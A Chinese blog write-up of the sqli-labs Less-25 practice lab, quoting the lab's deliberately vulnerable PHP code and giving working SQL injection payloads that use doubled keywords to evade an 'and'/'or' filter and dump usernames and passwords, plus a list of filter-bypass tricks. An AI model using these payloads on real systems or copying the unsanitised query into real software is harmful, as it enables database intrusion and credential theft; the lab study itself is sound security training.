sqli-labs:less-25(过滤了and,or)

最新推荐文章于 2022-02-18 21:23:23 发布
最新推荐文章于 2022-02-18 21:23:23 发布
阅读量210 收藏
点赞数
分类专栏: SQL注入 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/120252802
版权

很人性化,还可以返回被过滤的语句。方便学习。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-25 Trick with OR & AND</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


// take the variables 
if(isset($_GET['id']))
{
	$id=$_GET['id'];
	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'ID:'.$id."\n");
	fclose($fp);

	//fiddling with comments
	$id= blacklist($id);
	//echo "<br>";
	//echo $id;
	//echo "<br>";
	$hint=$id;

// connectivity 
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	if($row)
	{
	  	echo "<font size='5' color= '#99FF00'>";	
	  	echo 'Your Login name:'. $row['username'];
	  	echo "<br>";
	  	echo 'Your Password:' .$row['password'];
	  	echo "</font>";
  	}
	else 
	{
		echo '<font color= "#FFFF00">';
		print_r(mysql_error());
		echo "</font>";  
	}
}
else 
{ 
	echo "Please input the ID as parameter with numeric value";
}


function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}




?>
</font> </div></br></br></br><center>
<img src="../images/Less-25.jpg" />
</br>
</br>
</br>
<img src="../images/Less-25-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font> 
</center>
</body>
</html>

在balcklist函数中不区分大小写的过滤掉了and和or。不过只是一次性过滤,我们可以使用双写绕过。(也就是你过滤了一个我还有一个)
 

?id=1' oorrder by 3-- #
?id=-1' union select 1,2,3-- #
?id=-1' union select 1,user(),database()-- #
?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),3-- #
?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'),3-- #
?id=-1' union select 1,(select group_concat(concat_ws('-',id,username,passwoorrd)) from users),3-- #

总结一下:

有过滤的时候首先要判断这个过滤是一次性的还是非一次性的:

若是一次性的,且只是将过滤字符换成了空字符:

双写绕过—— or=oorrand=anandd

若是非一次性的,就要考虑一些变形:

大小写变形绕过—— or=Or=oR=OR

利用运算符——   or=||and=&&

URL编码绕过——  #=%23,Hex编码—— ~=0x7e

添加注释  ——  /*or*/

~羽~.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
Sqli-labsLess-25和Less-25a
→_→
04-21 888
Less-25 GET-基于错误-您所有的OR&AND都属于我们-字符串单引号 Notice: Undefined variable: hint in C:\phpStudy\WWW\sqli\Less-25\index.php on line 81 Hint: Your Input is ...
Less-25 (绕过AND OR 过滤)
老司机开代码的博客
08-04 622
文章目录1. 题目分析2. 源码分析3. 注入过程 1. 题目分析 这一关还是一个基于GET的注入,还是要先构造一个ID作为参数给他传进去。因为题目给的是string single quote,所以ID的类型一定是单引号包裹的了。 根据一往的经验,两条语句一看便知。那么这道关卡的考点在哪里呢? 当我使用order by测试检索字段的时候,就出现了问题。 这里我明明输入的order by结果报错就只剩下了der by,根据题目上的or and and belong to us我们不难猜测,可能自己输入的
sqli-labs:less-26a(过滤了空格和注释,不能报错注入)
羽的博客
09-14 327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs-Advanced
Starr
02-18 1089
文章目录一. 过滤23. GET-strip comments25. GET-strip and/or25a. Blind 2526. GET-strip Spaces and Comments26a. Blind 26!!!!!!!!!!!!!!!!!!!27. GET-strip UNION/SELECT27a. Blind 2728. GET-strip UNION/SELECT-single quote with parenthesis28a.二. Second Order Injection24.
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs less 25
qq_45106794的博客
10-26 159
#sqli-labs less25 有过滤的时候首先要判断这个过滤是一次性的还是非一次性的: 若是一次性的,且只是将过滤字符换成了空字符: 双写——or=oorr、and=anandd 若是非一次性的,就要考虑一些变形: 大小写变形——or=Or=oR=OR 利用运算符——or=||、and=&& URL编码——#=%23,Hex编码——~=0x7e 添加注释——/or/ ...
2021-08-28培训web作业一sqli-labs
qq_45290991的博客
08-28 308
1-20的第4关联合注入 对于这个1-20关,不是说选一个吗?我选第4关:基于报错的双引号注入。 输入id=1’ 发现是”)闭合。 Where id = (“x”)? 我猜。然后看语句:果然!$result=mysql_query($sql);//返回查询的数据的一个结果集,需要用php相应的mysql函数取值。比如mysql_fetch_array()这个函数 会报错显示,并且限制一次回显行数。 不赘述。 5-19的第17关报错注入 班长说这个也是选一题,所以我选的是...
SQLi-Labs 学习笔记(Less 21-30)
Onlyme的博客
03-11 846
点击打开链接Less-21 基于错误的复杂的字符型Cookie注入①先打开网页查看 Welcome Dhakkan②查看源代码:[plain] view plain copy&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transit...
SQL(八)-用AND/OR过滤
THE CHOSEN 1
11-21 2088
1:(逻辑运算符 逻辑运算符可用于组合两个布尔值,并返回true,false或null的结果。 可以使用以下运算符: 使用SELECT语句检索数据时,请在WHERE子句中使用逻辑运算符来组合多个条件。 如果要选择满足所有给定条件的行,请使用逻辑运算符AND。 要查找30至40岁之间的客户的名称,请设置如下所示的查询: SELECT ID, FirstName,
SQL注入时当and、or等字符被过滤了怎么办
热门推荐
weixin_40950781的博客
08-25 1万+
SQL注入时and、or被过滤了怎么办当常用字符被注释无法使用时,通常采取以下方法(可自行搜索sql注入绕开过滤等):0x01字母被注释(or、and等)1. 大小写变形2. 改变编码3. 添加注释4. 往字符里面插入被过滤的字符(双写法)5.利用符号形式0x02数字被注释(1、2等)6. 使用浮点数0x03 符号被注释(<、>等)7. 利用函数代替 当常用字符被注释无法使用时,通常采...
php安全篇过滤用户输入的参数(转)
weixin_34296641的博客
07-07 143
规则 1:绝不要信任外部数据或输入 关于Web应用程序安全性,必须认识到的第一件事是不应该信任外部数据。外部数据(outside data) 包括不是由程序员在PHP代码中直接输入的任何数据。在采取措施确保安全之前,来自任何其他来源(比如 GET 变量、表单 POST、数据库、配置文件、会话变量或 cookie)的任何数据都是不可信任的。 例如,下面的数据元素可以被认为是安全的,因...
php mysql 过滤_17. PHP+Mysql注入防护与绕过
weixin_35278121的博客
01-19 277
黑名单关键字过滤与绕过过滤关键字and、orPHP匹配函数代码如下:preg_match('/(and|or)/i', $id)如何Bypass,过滤注入测试语句:1 or 1 = 1 1 and 1 = 1测试方法可以替换为如下语句测试:1 || 1 = 1 1 && 1 = 1过滤关键字and, or, unionP...
sqli-labs 第25关(过滤or和AND )
qq_46527080的博客
12-25 1622
25关 源码分析 发现闭合点是的单引号 将or和AND替换成了空格 然后我们就来思路了,我们可以使用联合查询还有报错查询 一、判断注入点 二、判断列数 发现很直观的把我们的or给过滤掉了 我们试试双写 三、构造payload ?id=-1' union select 1,2,3--+ 1.爆库、 ?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ 由于information
sqli-labs:less-32(宽字节注入)
羽的博客
10-19 3062
宽字节注入 产生原因: 1、mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围) 2、mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。 mysqli_real_escape_string(*connection,escapestring*) connection 必需。规定要使用的 MySQL 连接 escapestr...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值